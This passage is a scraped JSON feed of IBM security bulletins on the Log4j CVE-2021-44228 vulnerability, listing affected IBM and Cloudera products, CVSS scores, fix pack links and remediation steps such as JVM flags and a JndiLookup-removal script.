(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling File Gateway| 6.0.0.0 - 6.1.1.0 \n \nNote that remote perimeter server, CLA2, OpsServer and external purge has been assessed for impact and were found to be not affected.\n\nDue to concern surrounding Apache Log4j CVE-2021-44228 end-of-support stream IBM Sterling B2B Integrator Version 5.2.x has been assessed for impact the versions and fix packs below were found to be not affected by CVE-2021-44228: \n5020605_3 and all lower fix packs \n5020604 and all fix packs \n5020603 and all fix packs \n5020602 and all fix packs \n5020601 and all fix packs \n5020600 and all fix packs \n5020500 and all fix packs \n5020402 and all fix packs\n\n## Remediation/Fixes\n\nProduct & Version| Remediation & Fix \n---|--- \n6.0.0.0 - 6.1.1.0| \n\n**_IIM_**\n\nStep 1: Apply IBM Sterling Filegateway IIM version 6.0.0.7, 6.0.3.5, 6.1.0.4, 6.1.1.0, 6.0.2.3 or 6.0.1.2 \n\nStep 2: Apply the remediating ifix 6.0.0.7_1, 6.0.3.5_1, 6.1.0.4_1 , 6.1.1.0_1, 6.0.2.3._1 or 6.0.1.2_1 that are located on [Fix Central](<https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=6.0.3.3-OtherSoftware-SFG-Docker-All&product=ibm%2FOther%20software%2FSterling%20File%20Gateway&release=All&platform=All&function=all>)\n\nAlso for 6.1.1.0 after applying the remediating ifix 6.1.1.0_1, additionally follow the steps in this [technote.](<https://www.ibm.com/support/pages/node/6551444> \"technote\" )\n\n**_Docker & Containers_**\n\nStep 1: Apply either IBM Sterling Filegateway Docker version 6.0.0.7, 6.0.3.5 or 6.1.0.4, \n\nStep 2: Next apply one of the remediating ifixes below:\n\nIBM Sterling Filegateway Docker version 6.0.0.7_1 on [Fix Central](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+B2B+Integrator&fixids=6.0.0.7-OtherSoftware-B2Bi-Docker-All-IF0001&source=SAR>)\n\nIBM Sterling Filegateway Docker version 6.0.3.5_1 on [Fix Central](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+File+Gateway&fixids=6.0.3.5-OtherSoftware-SFG-Docker-All-IF0001&source=SAR>)\n\nIBM Sterling Filegateway Container version 6.1.0.4_1\n\n * [Certified Container Image](<cp.icr.io/cp/ibm-sfg/sfg:6.1.0.4_1> \"Certified Container Image\" )\n * [Helm Chart](<https://github.com/IBM/charts/blob/master/repo/ibm-helm/ibm-sfg-prod-2.0.5.tgz> \"Helm Chart\" ) \n \n## Workarounds and Mitigations\n\n**If you are unable to apply the remediated fix packs above, as an alternative IBM Sterling File Gateway administrators should apply one of the following remediation steps below cased on deployment pattern.**\n\nThe following instruction applies to B2Bi ASI node and Adapter Container node\n\n 1. Use dashboard UI to navigate to Operations -> System -> Performance -> Tuning -> Edit Performance Configuration\n 2. Add -Dlog4j2.formatMsgNoLookups=true to JVM Argument Suffix box in the page for Performance Tuning: JVM Parameters for Sever\n 3. If there is any adapter container node, do the same change to the page for Performance Tuning: JVM Parameters Container \n 4. Stop B2Bi\n 5. Run setupfiles.sh or setupfiles.cmd \n 6. Restart B2Bi\n\nThe following instruction applies to the Liberty server for B2Bi REST API\n\n 1. Edit <install_dir>\\liberty\\wlp\\usr\\servers\\SIServer\\jvm.options file and find the line that says -Dlog4j2.disable.jmx=true and open up a new line below that and add the following on a new line by itself: -Dlog4j2.formatMsgNoLookups=true \nExample: \n-Dlog4j2.disable.jmx=true \n-Dlog4j2.formatMsgNoLookups=true\n 2. Stop B2Bi\n 3. Restart B2Bi\n\nThe following instruction applies to B2Bi with Docker Container \n\n 1. Use dashboard UI to navigate to Operations -> System -> Performance -> Tuning -> Edit Performance Configuration \n 2. Add -Dlog4j2.formatMsgNoLookups=true to JVM Argument Suffix box in the page for Performance Tuning: JVM Parameters for Server \n 3. Liberty: update the setup.cfg LIBERTY_JVM_OPTIONS as LIBERTY_JVM_OPTIONS= -Dlog4j2.formatMsgNoLookups=true \n 4. Run docker run with run_all option for the new setup.cfg \n\nThe following instruction applies to B2Bi with OCP\n\n 1. Update values.yaml for B2Bi. Update the jvm option for the entries below in ibm-b2bi-case-bundle\\charts\\ibm-b2bi-prod\\values.yaml \n\n * libertyJvmOptions: -Dlog4j2.formatMsgNoLookups=true \n * asi: jvmOptions: -Dlog4j2.formatMsgNoLookups=true \n * ac: jvmOptions: -Dlog4j2.formatMsgNoLookups=true \n * api: jvmOptions: -Dlog4j2.formatMsgNoLookups=true \n * Update dataSetup: enabled: false \n * After saving values.yaml, run helm upgrade <helm_version>-f values.yaml . --recreate-pods\n * Same steps need to be followed for ibm-sfg-case-bundle\\charts\\ibm-sfg-prod\\values.yaml for SFG.\n 2. Restart B2Bi\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n12 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSMJDR\",\"label\":\"IBM Sterling File Gateway\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"6.0.0.0 - 6.1.1.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-18T17:28:27", "type": "ibm", "title": "Security Bulletin: Apache Log4j Vulnerability Affects IBM Sterling File Gateway (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-18T17:28:27", "id": "8F6A844E65558AF61A350206417B63BD70D5B529641691C495C07407B13441B7", "href": "https://www.ibm.com/support/pages/node/6526204", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:41", "description": "## Summary\n\nIBM products for Cloudera Data Platform and Hortonworks Data Platform are affected by critical Apache Log4j vulnerability (CVE-2021-44228). A malicious user could exploit this vulnerability to run arbitrary code as the user or service account running the affected software. The fix includes Apache Log4j v2.16.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected IBM Product(s)**| **Version(s)** \n---|--- \nHortonworks Data Platform (HDP) with IBM| 3.0, 3.0.1 \n \nCloudera Data Platform (CDP) with IBM\n\n * Includes Cloudera Data Hub (CDH) and Cloudera Manager (CM)\n| 7.0 - 7.1.7 \n \n## Remediation/Fixes\n\n**Customers are encouraged to act swiftly to resolve this issue.**\n\n**Apply hotfix**\n\nDownload all files from this repo: <https://github.com/cloudera/cloudera-scripts-for-log4j>\n\n## Steps\n\nRun the following script on all affected cluster nodes.\n\n**NOTE**: After applying the Short Term Resolution, if you add a node, you will need to re-apply the Short Term Resolution again on the new nodes.\n\n**Script: run_log4j_patcher.sh [cdp|cdh|hdp]**\n\n**Function:** The run_log4j_patcher.sh script scans a directory for jar files and removes JndiLookup.class from the ones it finds. Do not run any other script in the downloaded directory--they will be called by run_log4j_patcher.sh automatically.\n\n 1. Stop all running jobs in the production cluster before executing the script\n 2. Navigate to **Cloudera Manager > YARN** > Configuration and ensure that yarn.nodemanager.delete.debug-delay-sec is set to 0 If the value is not zero, you must restart the YARN service after setting the value to 0\n 3. Navigate to **Cloudera Manager > YARN** > Configuration and search for yarn.nodemanager.local-dirs to get the configured Node Manager Local Directory path\n 4. Remove filecache and usercache folder located inside the folders that are specified in yarn.nodemanager.local-dirs\n 5. Download all files from the GitHub repo and copy to all nodes of your cluster.\n 6. Run the script as root on ALL nodes of your cluster. \na. Script will take 1 mandatory argument (cdh|cdp|hdp) \nb. The script takes 2 optional arguments: a base directory to scan in, and a backup directory. The default for both are /opt/cloudera and /opt/cloudera/log4shell-backup, respectively. These defaults work for CM/CDH 6 and CDP 7. A different folder will be updated for HDP.\n 7. Ensure that the last line of the script output indicates \u2018Finished\u2019 to verify that the job has completed successfully. The script will fail if a command exits unsuccessfully.\n 8. Restart Cloudera Manager Server, all clusters, and all running jobs and queries.\n\n**Usage: $PROG (subcommand) [options] **\n\n**Subcommands:**\n\n * help Prints this message\n * cdh Scan a CDH cluster node\n * cdp Scan a CDP cluster node\n * hdp Scan a HDP cluster node\n\n**Options (cdh and cdp subcommands only):**\n\n-t <targetdir> Override target directory (default: distro-specific) \n-b <backupdir> Override backup directory (default: /opt/cloudera/log4shell-backup)\n\n**Environment Variables (cdh and cdp subcommands only):**\n\nThe SKIP_* environment variables should only be used if you are running the script again and want to skip phases that have already completed. \nSKIP_JAR If non-empty, skips scanning and patching .jar files \nSKIP_TGZ If non-empty, skips scanning and patching .tar.gz files\n\nSKIP_HDFS* If non-empty, skips scanning and patching .tar.gz files in HDFS\n\nRUN_SCAN If non-empty, runs a final scan for missed vulnerable files.\n\nThis can take several hours.\n\n**NOTE**: CDH/CDP Parcels: The script removes the affected class from all CDH/CDP parcels already installed under /opt/cloudera. This script needs to be re-run after new parcels are installed or after upgrading to versions of CDH/CDP that do not include the long-term fix.\n\n**Removing affected classes from Oozie Shared Libraries (CDH & CDP)**\n\nThe vulnerability affects client libraries uploaded in HDFS by Cloudera Manager. The script takes care of Tez and MapReduce libraries however Oozie libraries will need to be updated manually. The following section only applies to Cloudera Data Hub and Cloudera Data Platform releases.\n\nFollow the instructions below to secure the Oozie shared libraries:\n\n1\\. Execute the run_log4j_patcher.sh on the affected cluster.\n\n2\\. Navigate to Cloudera Manager > Oozie > Actions -> \u201cInstall Oozie ShareLib\u201d to re-upload the Oozie libraries in the HDFS from Cloudera Manager. \nIMPORTANT: Ensure that the Oozie service is running prior to executing the command.\n\n**Removing affected classes from Oozie Shared Libraries (HDP)**\n\nRun these commands to update Oozie share lib:\n \n \n su oozie\n kinit oozie /usr/hdp/current/oozie-server/bin/oozie-setup.sh sharelib\n create -fs hdfs://ns1\n oozie admin -oozie http(s)://<oozie-host/loadbalancer>:11(000|443)/oozie\n -sharelibupdate\n \n\n**For the latest updates from Cloudera**, refer to [Resolution for TSB-545 - Private Cloud](<https://my.cloudera.com/knowledge/Title-Resolution-for-TSB-545---Critical-vulnerability-in?id=332012>).\n\nKnown Limitations: Cloudera Data Hub clusters using packages rather than parcels are not yet supported with this fix.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n14 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS7VGD\",\"label\":\"Cloudera Enterprise Data Hub\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"All\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-17T14:19:15", "type": "ibm", "title": "Security Bulletin: Cloudera Data Platform is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-17T14:19:15", "id": "F0166F21D9D8651F7C71CAAA5131EEC4CE044F990491482A736F6DD767A3EC0F", "href": "https://www.ibm.com/support/pages/node/6541046", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:46", "description": "## Summary\n\nLog4j is used by i2 Analyze and i2 Connect for general purpose and application error logging. It is also used in Analyst's Notebook Premium when the chart store is deployed. This bulletin provides mitigation for the reported CVE-2021-44228 by providing configuration that addresses Log4j being vulnerable.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Software versions requiring changes to both i2 Analyze application server and Solr**\n\n**Software**| **Version**| **Notes** \n---|---|--- \ni2 Analyze| 4.3.5.0| bundled with EIA 2.4.1.0 \ni2 Analyze| 4.3.4.0| bundled with EIA 2.4.0.0 \ni2 Analyze| 4.3.3.0| bundled with EIA 2.3.4.0 \ni2 Connect| 1.1.1| shipped with i2 Analyze 4.3.5.0 \ni2 Connect| 1.1.0| shipped with i2 Analyze 4.3.4.0 \ni2 Connect| 1.0.3| shipped with i2 Analyze 4.3.3.0 \nAnalyst's Notebook Premium| 9.3.1| Chart store component \nAnalyst's Notebook Premium| 9.3.0| Chart Store component \n \n**Software versions requiring changes to Solr only**\n\n**Software**| **Version**| **Notes** \n---|---|--- \ni2 Analyze| 4.3.2.0| bundled with EIA 2.3.2.0 \ni2 Analyze| 4.3.2.0| bundled with EIA 2.3.3.0 \ni2 Connect| 1.0.2| shipped with i2 Analyze 4.3.2.0 \n \n \n\n\n## Remediation/Fixes\n\nPlease find your version in the tables below and follow the fix pack links for update and instructions.** \n \nSoftware versions requiring changes to both i2 Analyze application server and Solr**\n\n**Software**| **Version**| **Notes**| **Fix pack links** \n---|---|---|--- \ni2 Analyze| 4.3.5.0| bundled with EIA 2.4.1.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.4.1.2-SEC-i2EIA-WinLinux-FP0002&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.4.1.2-SEC-i2EIA-WinLinux-FP0002&includeSupersedes=0>) \ni2 Analyze| 4.3.4.0| bundled with EIA 2.4.0.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.4.0.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.4.0.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0>) \ni2 Analyze| 4.3.3.0| bundled with EIA 2.3.4.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.4.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.4.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0>) \ni2 Connect| 1.1.1| shipped with i2 Analyze 4.3.5.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.1.1.2-SEC-I2CONNECT-WinLinux-FP0001&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.1.1.2-SEC-I2CONNECT-WinLinux-FP0001&includeSupersedes=0>) \ni2 Connect| 1.1.0| shipped with i2 Analyze 4.3.4.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.4.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.4.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0>) \ni2 Connect| 1.0.3| shipped with i2 Analyze 4.3.3.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.0.3.3-SEC-I2CONNECT-WinLinux-FP0002&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.0.3.3-SEC-I2CONNECT-WinLinux-FP0002&includeSupersedes=0>) \nAnalyst's Notebook Premium| 9.3.1| Chart store component| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Analysts+Notebook+Premium&release=All&platform=All&function=fixId&fixids=9.3.1.2-SEC-I2ANBP-Win-FP0002&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Analysts+Notebook+Premium&release=All&platform=All&function=fixId&fixids=9.3.1.2-SEC-I2ANBP-Win-FP0002&includeSupersedes=0>) \nAnalyst's Notebook Premium| 9.3.0| Chart Store component| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Analysts+Notebook+Premium&release=All&platform=All&function=fixId&fixids=9.3.0.3-SEC-I2ANBP-Win-FP0003&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Analysts+Notebook+Premium&release=All&platform=All&function=fixId&fixids=9.3.0.3-SEC-I2ANBP-Win-FP0003&includeSupersedes=0>) \n \n**Software versions requiring changes to Solr only**\n\n**Software**| **Version**| **Notes**| **Fix pack links** \n---|---|---|--- \ni2 Analyze| 4.3.2.0| bundled with EIA 2.3.2.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.2.2-SEC-i2EIA-WinLinux-FP0002&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.2.2-SEC-i2EIA-WinLinux-FP0002&includeSupersedes=0>) \ni2 Connect| 1.0.2| shipped with i2 Analyze 4.3.2.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.0.2.2-SEC-I2CONNECT-WinLinux-FP0002&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.0.2.2-SEC-I2CONNECT-WinLinux-FP0002&includeSupersedes=0>) \n \n## Workarounds and Mitigations\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n13 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSXVMQ\",\"label\":\"i2 Analyst\\u0026apos;s Notebook Premium\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"ALL\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSXVTH\",\"label\":\"i2 Analyze\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"ALL\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-24T08:33:49", "type": "ibm", "title": "Security Bulletin: i2 Analyze, i2 Connect and Analyst's Notebook Premium are affected by the Log4j vulnerability (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-24T08:33:49", "id": "7566B2B0BD8AE66EDD74AA6296BA3C094CC3661C2B4C3EADB69127C0EBE5A710", "href": "https://www.ibm.com/support/pages/node/6526220", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:31", "description": "## Summary\n\nLog4j is used by IBM Cloud Pak for Data System 2.0 in openshift-logging. This bulletin provides a remediation for the reported Apache Log4j vulnerability, CVE-2021-44228.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \n \nIBM Cloud Pak for Data System 2.0 -\n\nOpenshift Container Platform 4\n\n| 2.0.0.0 - 2.0.1.1 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by applying following remediation \n**\n\n**Product**| VRMF| Remediation / Fix \n---|---|--- \n \nIBM Cloud Pak for Data System 2.0 - Openshift Container Platform 4\n\n| 1.0.0.0-openshift-4.6.log4j-WS-ICPDS-fp132 | [Link to Fix Central](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FWebSphere%2FIBM+Cloud+Private+for+Data+System&fixids=1.0.0.0-openshift-4.6.log4j-WS-ICPDS-fp132&source=SAR&function=fixId&parent=ibm/WebSphere>) \n \n**Please follow the steps given in [release notes](<https://www.ibm.com/docs/en/cloud-paks/cloudpak-data-system/2.0?topic=20-log4j-vulnerability-patch> \"release notes\" ) to apply above remediation.**\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response 